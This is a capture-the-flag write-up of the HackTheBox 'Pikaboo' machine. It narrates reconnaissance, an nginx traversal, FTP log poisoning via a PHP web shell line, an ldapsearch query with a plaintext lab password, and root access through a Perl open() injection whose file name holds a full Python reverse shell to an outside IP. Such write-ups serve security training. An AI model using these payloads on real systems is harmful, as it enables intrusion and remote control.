CTF-Writeups/HackTheBox/Pikaboo.md
2021-12-11 20:19:00 +05:00

6.7 KiB

HackTheBox-Pikaboo

NMAP

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                                                            
|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAgG6pLBPMmXneLGYurX9xbt6cE2IYdEN9J/ijCVrQbpUyVeTNWNoFnpB8+DIcppOtsJu0X3Iwpfb1eTmuop8q9nNlmyOcOTBHYOYLQwa+G4
e90Bsku86ndqs+LU09sjqss5n3XdZoFqunNfZb7EirVVCgI80Lf8F+3XRRIX3ErqNrk2LiaQQY6fcAaNALaQy9ked7KydWDFYizO2dnu8ee2ncdXFMBeVDKGVfrlHAoRFoTmCEljCP1Vsjt69NDB
udCGJBgU1MbItTF7DtbNQWGQmw8/9n9Jq8ic/YxOnIKRDDUuuWdE3sy2dPiw0ZVuG7V2GnkkMsGv0Qn3Uq9Qx7
|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIJl6Z/XtGXJwSnO57P3CesJfRbmGNra4AuSSHCGUocKchdp3JnNE704lMnocAevDwi9HsAKAR
xCup18UpPHz+I=
|   256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINyHVcrR4jjhBG5vZsvKRsKO4SnXj3GqeMtwvFSvd4B4
80/tcp open  http    syn-ack ttl 63 nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

We have three links on the home page on navigation bar , Pokeatdex , Contact and Admin so first let's visit what's the pokatdex is about

We can see some pokemon thingys over here and on hovering on the name we can see that it will take to us on pokeapi.php

There's a GET parameter named id here so we can try running sqlmap here

This failed so maybe there's no sqli on here , moving forward there's a contact page

I tried clicking on send button but it didn't work probably there wasn't any implementation done on this page, so we are only left with the admin page

We see that it asks us for a password , we could try some default one's admin:admin , admin:password , admin:Password123, none of them worked but I did notice something strange about the error message

That page is being hosted from Apache and the nmap scan showed us that port 80 is using nginx so nginx is being used as a reverse proxy here and we can abuse knowing that there's nginx reverse proxy mapping which could allow us to do directory traversal

https://book.hacktricks.xyz/pentesting/pentesting-web/nginx

So let's try if we can bypass to do LFI

We get a 403 forbidden error means that directory listing isn't avilable but we can try to access a file in there or another folder that we have rights so , let's use ffuf to fuzz for files or directories, one thing note that when I git cloned ffuf from main branch I faced issues and was giving false positive reults so I switched the branch to dev and then cloned it , that worked perfectly for me

Here we found server-status which monitors the load on the server and thells about the incoming requets on the web server through an HTML page

We can see a request to admin_staging in which index.php has parameter which is viewing the vsftpd logs which are bascially ftp login logs which means that we can poison thses logs to get remote code execution

https://secnhack.in/ftp-log-poisoning-through-lfi/

So first we need to login with a name having a php command which will be having a GET parameter being executed as a system command

<?php system($_GET['cmd']);?>

Now adding cmd argument with a php reverse shell command we can get a shell

We can stabilize our shell in this way ,so that we can have the functionality of clearing the terminal screen and navigating through bash history with up and down arrow keys

Let's do some basic enumeration by looking at local ports

Here we see only port 398 and 81 , 389 seems intersting as we already know about port 81 that it's using apache

Looking at running cronjobs we do see one , which is being ran by root every minute

The script is running a for loop which grabs the all the folders in ftp folder and will run a perl script on only those files which have .csv file extension after that those files will be removed , if we look into ftp folder we don't have permissions

So doing some more enumeration, In the /opt directory we can see a folder

Further going into /config/settings.py we can find LDAP credentials

We can run this LDAP command to query everything from the machine

ldapsearch -x -LLL -h localhost -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w "J~42%W?PFHl]g"  -b "dc=pikaboo,dc
=htb"

Here we have to base64 encoded passwords on decoding it to text form we can get pwnmeow's password

I tried the password on ssh , through switching user but didn't worked on them , but it did worked on ftp

Looking at that perl script

For getting root , we can see that the perl script which is csvupdate is being ran on the files that are in FTP folders which will run on the file having .csv extension , there's function in the perl script open() which is vulnerable to command injection if we supply the commands as file name with | as a prefix , so we need to upload a python reverse shell in the form of a file name.

"|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.116",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'; .csv"